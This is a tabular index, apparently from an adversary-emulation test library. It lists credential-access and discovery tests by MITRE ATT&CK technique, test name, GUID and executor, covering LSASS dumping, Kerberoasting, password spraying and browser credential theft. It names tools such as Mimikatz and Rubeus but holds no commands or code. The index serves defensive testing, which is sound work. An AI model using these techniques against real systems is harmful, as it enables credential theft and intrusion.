1681 credential-access T1003.004 OS Credential Dumping: LSA Secrets 1 Dumping LSA Secrets 55295ab0-a703-433b-9ca4-ae13807de12f command_prompt
1682 credential-access T1003.004 OS Credential Dumping: LSA Secrets 2 Dump Kerberos Tickets from LSA using dumper.ps1 2dfa3bff-9a27-46db-ab75-7faefdaca732 powershell
1683 credential-access T1606.002 Forge Web Credentials: SAML token 1 Golden SAML b16a03bc-1089-4dcc-ad98-30fe8f3a2b31 powershell
1684 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 1 Dump individual process memory with sh (Local) 7e91138a-8e74-456d-a007-973d67a0bb80 sh
1685 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 2 Dump individual process memory with sh on FreeBSD (Local) fa37b633-e097-4415-b2b8-c5bf4c86e423 sh
1686 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 3 Dump individual process memory with Python (Local) 437b2003-a20d-4ed8-834c-4964f24eec63 sh
1687 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 4 Capture Passwords with MimiPenguin a27418de-bdce-4ebd-b655-38f04842bf0c bash
1688 credential-access T1040 Network Sniffing 1 Packet Capture Linux using tshark or tcpdump 7fe741f7-b265-4951-a7c7-320889083b3e bash
1689 credential-access T1040 Network Sniffing 2 Packet Capture FreeBSD using tshark or tcpdump c93f2492-9ebe-44b5-8b45-36574cccfe67 sh
1690 credential-access T1040 Network Sniffing 3 Packet Capture macOS using tcpdump or tshark 9d04efee-eff5-4240-b8d2-07792b873608 bash
1691 credential-access T1040 Network Sniffing 4 Packet Capture Windows Command Prompt a5b2f6a0-24b4-493e-9590-c699f75723ca command_prompt
1692 credential-access T1040 Network Sniffing 5 Windows Internal Packet Capture b5656f67-d67f-4de8-8e62-b5581630f528 command_prompt
1693 credential-access T1040 Network Sniffing 6 Windows Internal pktmon capture c67ba807-f48b-446e-b955-e4928cd1bf91 command_prompt
1694 credential-access T1040 Network Sniffing 7 Windows Internal pktmon set filter 855fb8b4-b8ab-4785-ae77-09f5df7bff55 command_prompt
1695 credential-access T1040 Network Sniffing 8 Packet Capture macOS using /dev/bpfN with sudo e6fe5095-545d-4c8b-a0ae-e863914be3aa bash
1696 credential-access T1040 Network Sniffing 9 Filtered Packet Capture macOS using /dev/bpfN with sudo e2480aee-23f3-4f34-80ce-de221e27cd19 bash
1697 credential-access T1040 Network Sniffing 10 Packet Capture FreeBSD using /dev/bpfN with sudo e2028771-1bfb-48f5-b5e6-e50ee0942a14 sh
1698 credential-access T1040 Network Sniffing 11 Filtered Packet Capture FreeBSD using /dev/bpfN with sudo a3a0d4c9-c068-4563-a08d-583bd05b884c sh
1699 credential-access T1040 Network Sniffing 12 Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo 10c710c9-9104-4d5f-8829-5b65391e2a29 bash
1700 credential-access T1040 Network Sniffing 13 Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo 7a0895f0-84c1-4adf-8491-a21510b1d4c1 bash
1701 credential-access T1040 Network Sniffing 14 Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo 515575ab-d213-42b1-aa64-ef6a2dd4641b bash
1702 credential-access T1040 Network Sniffing 15 Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo b1cbdf8b-6078-48f5-a890-11ea19d7f8e9 bash
1703 credential-access T1040 Network Sniffing 16 PowerShell Network Sniffing 9c15a7de-de14-46c3-bc2a-6d94130986ae powershell
1704 credential-access T1552.002 Unsecured Credentials: Credentials in Registry 1 Enumeration for Credentials in Registry b6ec082c-7384-46b3-a111-9a9b8b14e5e7 command_prompt
1705 credential-access T1552.002 Unsecured Credentials: Credentials in Registry 2 Enumeration for PuTTY Credentials in Registry af197fd7-e868-448e-9bd5-05d1bcd9d9e5 command_prompt
1706 credential-access T1556.002 Modify Authentication Process: Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
1707 credential-access T1556.002 Modify Authentication Process: Password Filter DLL 2 Install Additional Authentication Packages 91580da6-bc6e-431b-8b88-ac77180005f2 powershell
1708 credential-access T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting 1 Rubeus asreproast 615bd568-2859-41b5-9aed-61f6a88e48dd powershell
1709 credential-access T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting 2 Get-DomainUser with PowerView d6139549-7b72-4e48-9ea1-324fc9bdf88a powershell
1710 credential-access T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting 3 WinPwn - PowerSharpPack - Kerberoasting Using Rubeus 8c385f88-4d47-4c9a-814d-93d9deec8c71 powershell
1711 credential-access T1555 Credentials from Password Stores 1 Extract Windows Credential Manager via VBA 234f9b7c-b53d-4f32-897b-b880a6c9ea7b powershell
1712 credential-access T1555 Credentials from Password Stores 2 Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] c89becbe-1758-4e7d-a0f4-97d2188a23e3 powershell
1713 credential-access T1555 Credentials from Password Stores 3 Dump credentials from Windows Credential Manager With PowerShell [web Credentials] 8fd5a296-6772-4766-9991-ff4e92af7240 powershell
1714 credential-access T1555 Credentials from Password Stores 4 Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] 36753ded-e5c4-4eb5-bc3c-e8fba236878d powershell
1715 credential-access T1555 Credentials from Password Stores 5 Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] bc071188-459f-44d5-901a-f8f2625b2d2e powershell
1716 credential-access T1555 Credentials from Password Stores 6 WinPwn - Loot local Credentials - lazagne 079ee2e9-6f16-47ca-a635-14efcd994118 powershell
1717 credential-access T1555 Credentials from Password Stores 7 WinPwn - Loot local Credentials - Wifi Credentials afe369c2-b42e-447f-98a3-fb1f4e2b8552 powershell
1718 credential-access T1555 Credentials from Password Stores 8 WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords db965264-3117-4bad-b7b7-2523b7856b92 powershell
1719 credential-access T1552 Unsecured Credentials 1 AWS - Retrieve EC2 Password Data using stratus a21118de-b11e-4ebd-b655-42f11142df0c sh
1720 credential-access T1552 Unsecured Credentials 2 Search for Passwords in Powershell History f9c3d0ab-479b-4019-945f-22ace2b1731a powershell
1721 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 1 Run Chrome-password Collector 8c05b133-d438-47ca-a630-19cc464c4622 powershell
1722 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 2 Search macOS Safari Cookies c1402f7b-67ca-43a8-b5f3-3143abedc01b sh
1723 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 3 LaZagne - Credentials from Browser 9a2915b3-3954-4cce-8c76-00fbf4dbd014 command_prompt
1724 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 4 Simulating access to Chrome Login Data 3d111226-d09a-4911-8715-fe11664f960d powershell
1725 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 5 Simulating access to Opera Login Data 28498c17-57e4-495a-b0be-cc1e36de408b powershell
1726 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 6 Simulating access to Windows Firefox Login Data eb8da98a-2e16-4551-b3dd-83de49baa14c powershell
1727 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 7 Simulating access to Windows Edge Login Data a6a5ec26-a2d1-4109-9d35-58b867689329 powershell
1728 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 8 Decrypt Mozilla Passwords with Firepwd.py dc9cd677-c70f-4df5-bd1c-f114af3c2381 powershell
1729 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 9 LaZagne.py - Dump Credentials from Firefox Browser 87e88698-621b-4c45-8a89-4eaebdeaabb1 sh
1730 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 10 Stage Popular Credential Files for Exfiltration f543635c-1705-42c3-b180-efd6dc6e7ee7 powershell
1731 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 11 WinPwn - BrowserPwn 764ea176-fb71-494c-90ea-72e9d85dce76 powershell
1732 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 12 WinPwn - Loot local Credentials - mimi-kittenz ec1d0b37-f659-4186-869f-31a554891611 powershell
1733 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 13 WinPwn - PowerSharpPack - Sharpweb for Browser Credentials e5e3d639-6ea8-4408-9ecd-d5a286268ca0 powershell
1734 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 14 Simulating Access to Chrome Login Data - MacOS 124e13e5-d8a1-4378-a6ee-a53cd0c7e369 sh
1735 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 15 WebBrowserPassView - Credentials from Browser e359627f-2d90-4320-ba5e-b0f878155bbe powershell
1736 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 16 BrowserStealer (Chrome / Firefox / Microsoft Edge) 6f2c5c87-a4d5-4898-9bd1-47a55ecaf1dd powershell
1737 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 17 Dump Chrome Login Data with esentutl 70422253-8198-4019-b617-6be401b49fce command_prompt
1738 credential-access T1552.004 Unsecured Credentials: Private Keys 1 Private Keys 520ce462-7ca7-441e-b5a5-f8347f632696 command_prompt
1739 credential-access T1552.004 Unsecured Credentials: Private Keys 2 Discover Private SSH Keys 46959285-906d-40fa-9437-5a439accd878 sh
1740 credential-access T1552.004 Unsecured Credentials: Private Keys 3 Copy Private SSH Keys with CP 7c247dc7-5128-4643-907b-73a76d9135c3 sh
1741 credential-access T1552.004 Unsecured Credentials: Private Keys 4 Copy Private SSH Keys with CP (freebsd) 12e4a260-a7fd-4ed8-bf18-1a28c1395775 sh
1742 credential-access T1552.004 Unsecured Credentials: Private Keys 5 Copy Private SSH Keys with rsync 864bb0b2-6bb5-489a-b43b-a77b3a16d68a sh
1743 credential-access T1552.004 Unsecured Credentials: Private Keys 6 Copy Private SSH Keys with rsync (freebsd) 922b1080-0b95-42b0-9585-b9a5ea0af044 sh
1744 credential-access T1552.004 Unsecured Credentials: Private Keys 7 Copy the users GnuPG directory with rsync 2a5a0601-f5fb-4e2e-aa09-73282ae6afca sh
1745 credential-access T1552.004 Unsecured Credentials: Private Keys 8 Copy the users GnuPG directory with rsync (freebsd) b05ac39b-515f-48e9-88e9-2f141b5bcad0 sh
1746 credential-access T1552.004 Unsecured Credentials: Private Keys 9 ADFS token signing and encryption certificates theft - Local 78e95057-d429-4e66-8f82-0f060c1ac96f powershell
1747 credential-access T1552.004 Unsecured Credentials: Private Keys 10 ADFS token signing and encryption certificates theft - Remote cab413d8-9e4a-4b8d-9b84-c985bd73a442 powershell
1748 credential-access T1552.004 Unsecured Credentials: Private Keys 11 CertUtil ExportPFX 336b25bf-4514-4684-8924-474974f28137 powershell
1749 credential-access T1552.004 Unsecured Credentials: Private Keys 12 Export Root Certificate with Export-PFXCertificate 7617f689-bbd8-44bc-adcd-6f8968897848 powershell
1750 credential-access T1552.004 Unsecured Credentials: Private Keys 13 Export Root Certificate with Export-Certificate 78b274f8-acb0-428b-b1f7-7b0d0e73330a powershell
1751 credential-access T1552.004 Unsecured Credentials: Private Keys 14 Export Certificates with Mimikatz 290df60e-4b5d-4a5e-b0c7-dc5348ea0c86 command_prompt
1752 credential-access T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay 1 LLMNR Poisoning with Inveigh (PowerShell) deecd55f-afe0-4a62-9fba-4d1ba2deb321 powershell
1753 credential-access T1003.001 OS Credential Dumping: LSASS Memory 1 Dump LSASS.exe Memory using ProcDump 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8 command_prompt
1754 credential-access T1003.001 OS Credential Dumping: LSASS Memory 2 Dump LSASS.exe Memory using comsvcs.dll 2536dee2-12fb-459a-8c37-971844fa73be powershell
1755 credential-access T1003.001 OS Credential Dumping: LSASS Memory 3 Dump LSASS.exe Memory using direct system calls and API unhooking 7ae7102c-a099-45c8-b985-4c7a2d05790d command_prompt
1756 credential-access T1003.001 OS Credential Dumping: LSASS Memory 4 Dump LSASS.exe Memory using NanoDump dddd4aca-bbed-46f0-984d-e4c5971c51ea command_prompt
1757 credential-access T1003.001 OS Credential Dumping: LSASS Memory 5 Dump LSASS.exe Memory using Windows Task Manager dea6c349-f1c6-44f3-87a1-1ed33a59a607 manual
1758 credential-access T1003.001 OS Credential Dumping: LSASS Memory 6 Offline Credential Theft With Mimikatz 453acf13-1dbd-47d7-b28a-172ce9228023 command_prompt
1759 credential-access T1003.001 OS Credential Dumping: LSASS Memory 7 LSASS read with pypykatz c37bc535-5c62-4195-9cc3-0517673171d8 command_prompt
1760 credential-access T1003.001 OS Credential Dumping: LSASS Memory 8 Dump LSASS.exe Memory using Out-Minidump.ps1 6502c8f0-b775-4dbd-9193-1298f56b6781 powershell
1761 credential-access T1003.001 OS Credential Dumping: LSASS Memory 9 Create Mini Dump of LSASS.exe using ProcDump 7cede33f-0acd-44ef-9774-15511300b24b command_prompt
1762 credential-access T1003.001 OS Credential Dumping: LSASS Memory 10 Powershell Mimikatz 66fb0bc1-3c3f-47e9-a298-550ecfefacbc powershell
1763 credential-access T1003.001 OS Credential Dumping: LSASS Memory 11 Dump LSASS with createdump.exe from .Net v5 9d0072c8-7cca-45c4-bd14-f852cfa35cf0 powershell
1764 credential-access T1003.001 OS Credential Dumping: LSASS Memory 12 Dump LSASS.exe using imported Microsoft DLLs 86fc3f40-237f-4701-b155-81c01c48d697 powershell
1765 credential-access T1003.001 OS Credential Dumping: LSASS Memory 13 Dump LSASS.exe using lolbin rdrleakdiag.exe 47a539d1-61b9-4364-bf49-a68bc2a95ef0 powershell
1766 credential-access T1003.001 OS Credential Dumping: LSASS Memory 14 Dump LSASS.exe Memory through Silent Process Exit eb5adf16-b601-4926-bca7-dad22adffb37 command_prompt
1767 credential-access T1110.003 Brute Force: Password Spraying 1 Password Spray all Domain Users 90bc2e54-6c84-47a5-9439-0a2a92b4b175 command_prompt
1768 credential-access T1110.003 Brute Force: Password Spraying 2 Password Spray (DomainPasswordSpray) 263ae743-515f-4786-ac7d-41ef3a0d4b2b powershell
1769 credential-access T1110.003 Brute Force: Password Spraying 3 Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) f14d956a-5b6e-4a93-847f-0c415142f07d powershell
1770 credential-access T1110.003 Brute Force: Password Spraying 4 Password spray all Azure AD users with a single password a8aa2d3e-1c52-4016-bc73-0f8854cfa80a powershell
1771 credential-access T1110.003 Brute Force: Password Spraying 5 WinPwn - DomainPasswordSpray Attacks 5ccf4bbd-7bf6-43fc-83ac-d9e38aff1d82 powershell
1772 credential-access T1110.003 Brute Force: Password Spraying 6 Password Spray Invoke-DomainPasswordSpray Light b15bc9a5-a4f3-4879-9304-ea0011ace63a powershell
1773 credential-access T1110.003 Brute Force: Password Spraying 7 Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365) f3a10056-0160-4785-8744-d9bd7c12dc39 powershell
1774 credential-access T1110.003 Brute Force: Password Spraying 8 Password Spray using Kerbrute Tool c6f25ec3-6475-47a9-b75d-09ac593c5ecb powershell
1775 credential-access T1110.003 Brute Force: Password Spraying 9 AWS - Password Spray an AWS using GoAWSConsoleSpray 9c10d16b-20b1-403a-8e67-50ef7117ed4e sh
1776 credential-access T1003.005 OS Credential Dumping: Cached Domain Credentials 1 Cached Credential Dump via Cmdkey 56506854-89d6-46a3-9804-b7fde90791f9 command_prompt
1777 credential-access T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket 1 Crafting Active Directory golden tickets with mimikatz 9726592a-dabc-4d4d-81cd-44070008b3af powershell
1778 credential-access T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket 2 Crafting Active Directory golden tickets with Rubeus e42d33cd-205c-4acf-ab59-a9f38f6bad9c powershell
1779 credential-access T1649 Steal or Forge Authentication Certificates 1 Staging Local Certificates via Export-Certificate eb121494-82d1-4148-9e2b-e624e03fbf3d powershell
1780 credential-access T1552.003 Unsecured Credentials: Bash History 1 Search Through Bash History 3cfde62b-7c33-4b26-a61e-755d6131c8ce sh
1781 credential-access T1552.003 Unsecured Credentials: Bash History 2 Search Through sh History d87d3b94-05b4-40f2-a80f-99864ffa6803 sh
1782 credential-access T1552.001 Unsecured Credentials: Credentials In Files 1 Find AWS credentials 37807632-d3da-442e-8c2e-00f44928ff8f sh
1783 credential-access T1552.001 Unsecured Credentials: Credentials In Files 2 Extract Browser and System credentials with LaZagne 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79 bash
1784 credential-access T1552.001 Unsecured Credentials: Credentials In Files 3 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
1785 credential-access T1552.001 Unsecured Credentials: Credentials In Files 4 Extracting passwords with findstr 0e56bf29-ff49-4ea5-9af4-3b81283fd513 powershell
1786 credential-access T1552.001 Unsecured Credentials: Credentials In Files 5 Access unattend.xml 367d4004-5fc0-446d-823f-960c74ae52c3 command_prompt
1787 credential-access T1552.001 Unsecured Credentials: Credentials In Files 6 Find and Access Github Credentials da4f751a-020b-40d7-b9ff-d433b7799803 bash
1788 credential-access T1552.001 Unsecured Credentials: Credentials In Files 7 WinPwn - sensitivefiles 114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0 powershell
1789 credential-access T1552.001 Unsecured Credentials: Credentials In Files 8 WinPwn - Snaffler fdd0c913-714b-4c13-b40f-1824d6c015f2 powershell
1790 credential-access T1552.001 Unsecured Credentials: Credentials In Files 9 WinPwn - powershellsensitive 75f66e03-37d3-4704-9520-3210efbe33ce powershell
1791 credential-access T1552.001 Unsecured Credentials: Credentials In Files 10 WinPwn - passhunt 00e3e3c7-6c3c-455e-bd4b-461c7f0e7797 powershell
1792 credential-access T1552.001 Unsecured Credentials: Credentials In Files 11 WinPwn - SessionGopher c9dc9de3-f961-4284-bd2d-f959c9f9fda5 powershell
1793 credential-access T1552.001 Unsecured Credentials: Credentials In Files 12 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials aaa87b0e-5232-4649-ae5c-f1724a4b2798 powershell
1794 credential-access T1552.001 Unsecured Credentials: Credentials In Files 13 List Credential Files via PowerShell 0d4f2281-f720-4572-adc8-d5bb1618affe powershell
1795 credential-access T1552.001 Unsecured Credentials: Credentials In Files 14 List Credential Files via Command Prompt b0cdacf6-8949-4ffe-9274-a9643a788e55 command_prompt
1796 credential-access T1552.001 Unsecured Credentials: Credentials In Files 15 Find Azure credentials a8f6148d-478a-4f43-bc62-5efee9f931a4 sh
1797 credential-access T1552.001 Unsecured Credentials: Credentials In Files 16 Find GCP credentials aa12eb29-2dbb-414e-8b20-33d34af93543 sh
1798 credential-access T1552.001 Unsecured Credentials: Credentials In Files 17 Find OCI credentials 9d9c22c9-fa97-4008-a204-478cf68c40af sh
1799 credential-access T1528 Steal Application Access Token 1 Azure - Functions code upload - Functions code injection via Blob upload 9a5352e4-56e5-45c2-9b3f-41a46d3b3a43 powershell
1800 credential-access T1528 Steal Application Access Token 2 Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token 67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1 powershell
1801 credential-access T1552.006 Unsecured Credentials: Group Policy Preferences 1 GPP Passwords (findstr) 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f command_prompt
1802 credential-access T1552.006 Unsecured Credentials: Group Policy Preferences 2 GPP Passwords (Get-GPPPassword) e9584f82-322c-474a-b831-940fd8b4455c powershell
1803 credential-access T1056.002 Input Capture: GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
1804 credential-access T1056.002 Input Capture: GUI Input Capture 2 PowerShell - Prompt User for Password 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 powershell
1805 credential-access T1056.002 Input Capture: GUI Input Capture 3 AppleScript - Spoofing a credential prompt using osascript b7037b89-947a-427a-ba29-e7e9f09bc045 bash
1806 credential-access T1110.004 Brute Force: Credential Stuffing 1 SSH Credential Stuffing From Linux 4f08197a-2a8a-472d-9589-cd2895ef22ad bash
1807 credential-access T1110.004 Brute Force: Credential Stuffing 2 SSH Credential Stuffing From MacOS d546a3d9-0be5-40c7-ad82-5a7d79e1b66b bash
1808 credential-access T1110.004 Brute Force: Credential Stuffing 3 SSH Credential Stuffing From FreeBSD a790d50e-7ebf-48de-8daa-d9367e0911d4 sh
1809 credential-access T1110.004 Brute Force: Credential Stuffing 4 Brute Force:Credential Stuffing using Kerbrute Tool 4852c630-87a9-409b-bb5e-5dc12c9ebcde powershell
1810 credential-access T1187 Forced Authentication 1 PetitPotam 485ce873-2e65-4706-9c7e-ae3ab9e14213 powershell
1811 credential-access T1187 Forced Authentication 2 WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS 7f06b25c-799e-40f1-89db-999c9cc84317 powershell
1812 credential-access T1187 Forced Authentication 3 Trigger an authenticated RPC call to a target server with no Sign flag set 81cfdd7f-1f41-4cc5-9845-bb5149438e37 powershell
1813 credential-access T1555.006 Credentials from Password Stores: Cloud Secrets Management Stores 1 Azure - Dump All Azure Key Vaults with Microburst 1b83cddb-eaa7-45aa-98a5-85fb0a8807ea powershell
1814 credential-access T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow 1 Access /etc/shadow (Local) 3723ab77-c546-403c-8fb4-bb577033b235 bash
1815 credential-access T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow 2 Access /etc/master.passwd (Local) 5076874f-a8e6-4077-8ace-9e5ab54114a5 sh
1816 credential-access T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow 3 Access /etc/passwd (Local) 60e860b6-8ae6-49db-ad07-5e73edd88f5d sh
1817 credential-access T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow 4 Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat df1a55ae-019d-4120-bc35-94f4bc5c4b0a sh
1818 credential-access T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow 5 Access /etc/{shadow,passwd,master.passwd} with shell builtins f5aa6543-6cb2-4fae-b9c2-b96e14721713 sh
1819 credential-access T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket 1 Crafting Active Directory silver tickets with mimikatz 385e59aa-113e-4711-84d9-f637aef01f2c powershell
1820 credential-access T1555.004 Credentials from Password Stores: Windows Credential Manager 1 Access Saved Credentials via VaultCmd 9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439 command_prompt
1821 credential-access T1555.004 Credentials from Password Stores: Windows Credential Manager 2 WinPwn - Loot local Credentials - Invoke-WCMDump fa714db1-63dd-479e-a58e-7b2b52ca5997 powershell
1822 credential-access T1003.003 OS Credential Dumping: NTDS 1 Create Volume Shadow Copy with vssadmin dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f command_prompt
1823 credential-access T1003.003 OS Credential Dumping: NTDS 2 Copy NTDS.dit from Volume Shadow Copy c6237146-9ea6-4711-85c9-c56d263a6b03 command_prompt
1824 credential-access T1003.003 OS Credential Dumping: NTDS 3 Dump Active Directory Database with NTDSUtil 2364e33d-ceab-4641-8468-bfb1d7cc2723 command_prompt
1825 credential-access T1003.003 OS Credential Dumping: NTDS 4 Create Volume Shadow Copy with WMI 224f7de0-8f0a-4a94-b5d8-989b036c86da command_prompt
1826 credential-access T1003.003 OS Credential Dumping: NTDS 5 Create Volume Shadow Copy remotely with WMI d893459f-71f0-484d-9808-ec83b2b64226 command_prompt
1827 credential-access T1003.003 OS Credential Dumping: NTDS 6 Create Volume Shadow Copy remotely (WMI) with esentutl 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865 command_prompt
1828 credential-access T1003.003 OS Credential Dumping: NTDS 7 Create Volume Shadow Copy with Powershell 542bb97e-da53-436b-8e43-e0a7d31a6c24 powershell
1829 credential-access T1003.003 OS Credential Dumping: NTDS 8 Create Symlink to Volume Shadow Copy 21748c28-2793-4284-9e07-d6d028b66702 command_prompt
1830 credential-access T1003.003 OS Credential Dumping: NTDS 9 Create Volume Shadow Copy with diskshadow b385996c-0e7d-4e27-95a4-aca046b119a7 command_prompt
1831 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 1 Request for service tickets 3f987809-3681-43c8-bcd8-b3ff3a28533a powershell
1832 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 2 Rubeus kerberoast 14625569-6def-4497-99ac-8e7817105b55 powershell
1833 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 3 Extract all accounts in use as SPN using setspn e6f4affd-d826-4871-9a62-6c9004b8fe06 command_prompt
1834 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 4 Request A Single Ticket via PowerShell 988539bc-2ed7-4e62-aec6-7c5cf6680863 powershell
1835 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 5 Request All Tickets via PowerShell 902f4ed2-1aba-4133-90f2-cff6d299d6da powershell
1836 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 6 WinPwn - Kerberoasting 78d10e20-c874-45f2-a9df-6fea0120ec27 powershell
1837 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 7 WinPwn - PowerSharpPack - Kerberoasting Using Rubeus 29094950-2c96-4cbd-b5e4-f7c65079678f powershell
1838 credential-access T1003.006 OS Credential Dumping: DCSync 1 DCSync (Active Directory) 129efd28-8497-4c87-a1b0-73b9a870ca3e command_prompt
1839 credential-access T1003.006 OS Credential Dumping: DCSync 2 Run DSInternals Get-ADReplAccount a0bced08-3fc5-4d8b-93b7-e8344739376e powershell
1840 credential-access T1056.004 Input Capture: Credential API Hooking 1 Hook PowerShell TLS Encrypt/Decrypt Messages de1934ea-1fbf-425b-8795-65fb27dd7e33 powershell
1841 credential-access T1552.007 Kubernetes List Secrets 1 List All Secrets 31e794c4-48fd-4a76-aca4-6587c155bc11 bash
1842 credential-access T1552.007 Kubernetes List Secrets 2 ListSecrets 43c3a49d-d15c-45e6-b303-f6e177e44a9a bash
1843 credential-access T1552.007 Kubernetes List Secrets 3 Cat the contents of a Kubernetes service account token file 788e0019-a483-45da-bcfe-96353d46820f sh
1844 discovery T1033 System Owner/User Discovery 1 System Owner/User Discovery 4c4959bf-addf-4b4a-be86-8d09cc1857aa command_prompt
1845 discovery T1033 System Owner/User Discovery 2 System Owner/User Discovery 2a9b677d-a230-44f4-ad86-782df1ef108c sh
1846 discovery T1033 System Owner/User Discovery 3 Find computers where user has session - Stealth mode (PowerView) 29857f27-a36f-4f7e-8084-4557cd6207ca powershell
1847 discovery T1033 System Owner/User Discovery 4 User Discovery With Env Vars PowerShell Script dcb6cdee-1fb0-4087-8bf8-88cfd136ba51 powershell
1848 discovery T1033 System Owner/User Discovery 5 GetCurrent User with PowerShell Script 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b powershell
1849 discovery T1033 System Owner/User Discovery 6 System Discovery - SocGholish whoami 3d257a03-eb80-41c5-b744-bb37ac7f65c7 powershell
1850 discovery T1033 System Owner/User Discovery 7 System Owner/User Discovery Using Command Prompt ba38e193-37a6-4c41-b214-61b33277fe36 command_prompt
1851 discovery T1613 Container and Resource Discovery 1 Docker Container and Resource Discovery ea2255df-d781-493b-9693-ac328f9afc3f sh
1852 discovery T1613 Container and Resource Discovery 2 Podman Container and Resource Discovery fc631702-3f03-4f2b-8d8a-6b3d055580a1 sh
1853 discovery T1016.001 System Network Configuration Discovery: Internet Connection Discovery 1 Check internet connection using ping Windows e184b6bd-fb28-48aa-9a59-13012e33d7dc command_prompt
1854 discovery T1016.001 System Network Configuration Discovery: Internet Connection Discovery 2 Check internet connection using ping freebsd, linux or macos be8f4019-d8b6-434c-a814-53123cdcc11e bash
1855 discovery T1016.001 System Network Configuration Discovery: Internet Connection Discovery 3 Check internet connection using Test-NetConnection in PowerShell (ICMP-Ping) f8160cde-4e16-4c8b-8450-6042d5363eb0 powershell
1856 discovery T1016.001 System Network Configuration Discovery: Internet Connection Discovery 4 Check internet connection using Test-NetConnection in PowerShell (TCP-HTTP) 7c35779d-42ec-42ab-a283-6255b28e9d68 powershell
1857 discovery T1016.001 System Network Configuration Discovery: Internet Connection Discovery 5 Check internet connection using Test-NetConnection in PowerShell (TCP-SMB) d9c32b3b-7916-45ad-aca5-6c902da80319 powershell
1858 discovery T1615 Group Policy Discovery 1 Display group policy information via gpresult 0976990f-53b1-4d3f-a185-6df5be429d3b command_prompt
1859 discovery T1615 Group Policy Discovery 2 Get-DomainGPO to display group policy information via PowerView 4e524c4e-0e02-49aa-8df5-93f3f7959b9f powershell
1860 discovery T1615 Group Policy Discovery 3 WinPwn - GPOAudit bc25c04b-841e-4965-855f-d1f645d7ab73 powershell
1861 discovery T1615 Group Policy Discovery 4 WinPwn - GPORemoteAccessPolicy 7230d01a-0a72-4bd5-9d7f-c6d472bc6a59 powershell
1862 discovery T1615 Group Policy Discovery 5 MSFT Get-GPO Cmdlet 52778a8f-a10b-41a4-9eae-52ddb74072bf powershell
1863 discovery T1652 Device Driver Discovery 1 Device Driver Discovery 235b30a2-e5b1-441f-9705-be6231c88ddd powershell
1864 discovery T1087.002 Account Discovery: Domain Account 1 Enumerate all accounts (Domain) 6fbc9e68-5ad7-444a-bd11-8bf3136c477e command_prompt
1865 discovery T1087.002 Account Discovery: Domain Account 2 Enumerate all accounts via PowerShell (Domain) 8b8a6449-be98-4f42-afd2-dedddc7453b2 powershell
1866 discovery T1087.002 Account Discovery: Domain Account 3 Enumerate logged on users via CMD (Domain) 161dcd85-d014-4f5e-900c-d3eaae82a0f7 command_prompt
